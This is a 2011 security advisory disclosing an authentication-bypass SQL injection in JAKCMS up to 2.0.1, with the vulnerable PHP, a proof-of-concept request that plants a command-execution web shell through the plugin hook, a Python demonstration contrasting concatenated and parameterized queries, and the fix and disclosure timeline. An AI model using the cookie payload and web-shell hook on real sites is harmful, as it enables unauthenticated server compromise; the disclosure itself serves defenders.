Feb 18, 2011
- Title: JAKCMS SQL Injection (SS-2011-002)
- Version: 1.0
- Issue type: SQL injection
- Affected vendor: JAKCMS
- Release date: 18/02/2011
- Discovered by: Steven Seeley
Summary
JAKCMS is a web based content management system that allows the publication of galleries, blogs, events, videos and newsletters.
stratsec researcher Steven Seeley has identified a Blind SQL Injection vulnerability in the JAKCMS core which can lead to arbitrary code execution against the underlying web server.
As a result the vendor has released a patch addressing the issue. stratsec would like to acknowledge the speedy response time by Jerome from JAKCMS, producing a patch within 72 hours of notification.
Description
During the authentication process, a check is performed to ensure that the user accessing the page is not already logged in. This is done by inspecting the cookies set in the browser as ‘JAK_COOKIE_NAME’ and ‘JAK_COOKIE_PASS’. If both cookies are set, an SQL statement is executed to validate whether the user is logged in. The cookie values are concatenated directly into that statement without escaping, so the check contains an SQL injection vulnerability triggerable through both the ‘JAK_COOKIE_NAME’ and ‘JAK_COOKIE_PASS’ values.
If the resulting query is syntactically valid and returns at least one row, the user is granted access to the administrative console by setting the session variable ‘JAKLoggedIn’ to true. Below is a snippet from ‘class/class.userlogin.php’, lines 65-76, showing the vulnerable code.
public static function jakChecklogged()
{
    global $jakdb;
    // The cookie pair (or an existing session flag) triggers the lookup
    if ((isset($_COOKIE['JAK_COOKIE_NAME']) && isset($_COOKIE['JAK_COOKIE_PASS'])) || isset($_SESSION['JAKLoggedIn'])) {
        // COOKIE_NAME and COOKIE_PASS carry the raw cookie values and are concatenated into the statement unescaped
        $sql = 'SELECT * FROM '.DB_PREFIX.'user WHERE ((username = "'.COOKIE_NAME.'" AND password = "'.COOKIE_PASS.'") OR (sessi$
        $result = $jakdb->query($sql);
        // Any row returned is treated as a successful login
        if ($jakdb->affected_rows > 0) {
            $row = $result->fetch_assoc();
            $_SESSION['JAKLoggedIn'] = true;
Impact
The issue permits an unauthenticated attacker to bypass authentication on a system exposing an unpatched JAKCMS version and, through the plugin hook functionality available to administrators, to execute arbitrary PHP code on the web server. This may result in the complete compromise of the underlying web server.
Affected products
JAKCMS <= v2.0.1
Proof of concept
The proof of concept request below triggers the authentication bypass and stores malicious PHP code in the site map hook of the CMS. The ‘JAK_COOKIE_NAME’ value closes the parentheses around the username comparison and comments out the rest of the WHERE clause, so the query returns the row of the named user (here ‘admin’, which must be an existing account) regardless of the password supplied in ‘JAK_COOKIE_PASS’.
POST /[path]/admin/index.php?p=plugins&sp=newhook HTTP/1.1
Host: [target]
Cookie: JAK_COOKIE_PASS=test; JAK_COOKIE_NAME=admin"))+and+1=1--+%3b
Content-Type: application/x-www-form-urlencoded

jak_name=vulnerable&jak_hook=php_sitemap&jak_plugin=0&jak_exorder=1&jak_phpcode=system($_GET['cmd']);
Once the hook has been saved, an attacker can execute commands through the public site map page:
- http://[target]/[path]/index.php?p=sitemap&cmd=[CMD]
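To make the effect of the cookie payload on the jakChecklogged() query concrete, the following is an added example, not JAKCMS code: it rebuilds the statement by string concatenation the way the vulnerable function does, runs it against an in-memory SQLite table, and runs a parameterized version of the same check beside it. Assumptions (none of them from the advisory): the table is named jak_user, a session_key column stands in for the second OR branch that is truncated in the quoted snippet, the accounts and password-hash placeholders are constructed, and the MySQL double-quoted strings of the original query are converted to single quotes because SQLite treats double quotes as identifiers.

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample accounts (hypothetical usernames, password-hash placeholders, session keys).
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"
SAMPLE_USERS = [
    ("admin", ADMIN_HASH, "sess-admin-1"),
    ("editor", "e10adc3949ba59abbe56e057f20f883e", "sess-editor-7"),
]

# JAK_COOKIE_NAME value exactly as it appears in the advisory's proof of concept request.
ADVISORY_COOKIE_NAME = 'admin"))+and+1=1--+%3b'


def make_db():
    """In-memory stand-in for the user table (DB_PREFIX assumed to be 'jak_')."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE jak_user (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, session_key TEXT)"
    )
    conn.executemany(
        "INSERT INTO jak_user (username, password, session_key) VALUES (?, ?, ?)",
        SAMPLE_USERS,
    )
    return conn


def decode_cookie(raw):
    """URL-decode the cookie the way it arrives in $_COOKIE ('+' -> space, %3b -> ';')."""
    return unquote_plus(raw)


def to_sqlite_payload(payload):
    """The advisory targets MySQL double-quoted strings; SQLite needs single quotes."""
    return payload.replace('"', "'")


def jak_checklogged_vulnerable(conn, cookie_name, cookie_pass, session_key=""):
    """Mirrors the concatenation in jakChecklogged(): cookie values enter the SQL text unescaped.
    The session_key branch is an assumed stand-in for the clause truncated in the advisory."""
    sql = (
        "SELECT * FROM jak_user WHERE ((username = '" + cookie_name
        + "' AND password = '" + cookie_pass
        + "') OR (session_key = '" + session_key + "'))"
    )
    # affected_rows > 0 in the original is the only thing standing between the request and admin access
    return len(conn.execute(sql).fetchall()) > 0


def jak_checklogged_fixed(conn, cookie_name, cookie_pass, session_key=""):
    """Same check with bound parameters: the payload is compared as a literal username and never parsed as SQL."""
    sql = ("SELECT * FROM jak_user WHERE ((username = ? AND password = ?) "
           "OR (session_key = ?))")
    return conn.execute(sql, (cookie_name, cookie_pass, session_key)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    decoded = decode_cookie(ADVISORY_COOKIE_NAME)
    payload = to_sqlite_payload(decoded)
    print("decoded cookie     :", decoded)
    print("vulnerable, payload:", jak_checklogged_vulnerable(db, payload, "test"))
    print("vulnerable, honest :", jak_checklogged_vulnerable(db, "admin", "test"))
    print("fixed, payload     :", jak_checklogged_fixed(db, payload, "test"))
    print("fixed, real creds  :", jak_checklogged_fixed(db, "admin", ADMIN_HASH))
```

With the payload the concatenated statement collapses to `SELECT * FROM jak_user WHERE ((username = 'admin')) and 1=1`, so the wrong password "test" is never compared and the admin row comes back; the parameterized version treats the whole payload as a username that does not exist. Two practical points the advisory's request depends on: MySQL only recognises `--` as a comment when it is followed by whitespace, which is why the cookie encodes `--+%3b` (a space and a semicolon) rather than a bare `--`, and the bypass needs a real username in the cookie since the closing parentheses leave the username comparison intact. The parameterized check is the editor's illustration of the fix, not the code shipped in JAKCMS 2.0.3.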
Solution
Update to JAKCMS version 2.0.3.
Response timeline
- 11/02/2011 - Vendor notified.
- 11/02/2011 - Vendor acknowledges receipt of advisory.
- 11/02/2011 - Vendor confirms issue presence.
- 14/02/2011 - Patch released in version 2.0.3
- 18/02/2011 - This advisory published.
Download advisory: SS-2011-002 stratsec JAKCMS Code SQL Injection Advisory v1.0.pdf